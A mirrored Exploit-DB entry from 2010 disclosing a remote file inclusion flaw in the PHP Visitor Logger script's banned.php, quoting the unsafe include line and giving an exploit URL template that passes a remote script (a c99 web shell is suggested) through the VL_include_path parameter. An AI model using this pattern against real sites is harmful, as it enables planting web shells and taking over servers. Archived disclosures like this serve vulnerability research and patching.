bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/12820.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

36 lines
No EOL
959 B
Text
Raw Permalink Blame History

#-> Visitor Logger (banned.php) Remote File Include Vulnerability
#-> Date: 2010/05/31
#-> Vendor: http://www.graviton-mediatech.com
#-> Download: http://www.graviton-mediatech.com/downloads/Visitor-Logger/Visitor-Logger.zip
#-> Googledork: n/a
#-> Discovered by bd0rk
#-> Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com
#-> Website: www.soh-crew.it.tt
#-> Gr33tings: TheJT, Luna-Tic, Frauenarzt, Punkti ;-)
-------------------------------------------------------------------------------
Description 1: Look in file banned.php line three to four and you can see this
if (file_exists($VL_include_path."/banned.txt")) {
include($VL_include_path."/banned.txt");
-------------------------------------------------------------------------------
[+]Exploit: http://[target].com/[logger_path]/banned.php?VL_include_path=[SHELLCODE]
--> An attacker can use c99-shellcode, for example.
#### The 21 years old, german Hacker bd0rk ####
Reference in a new issue View git blame Copy permalink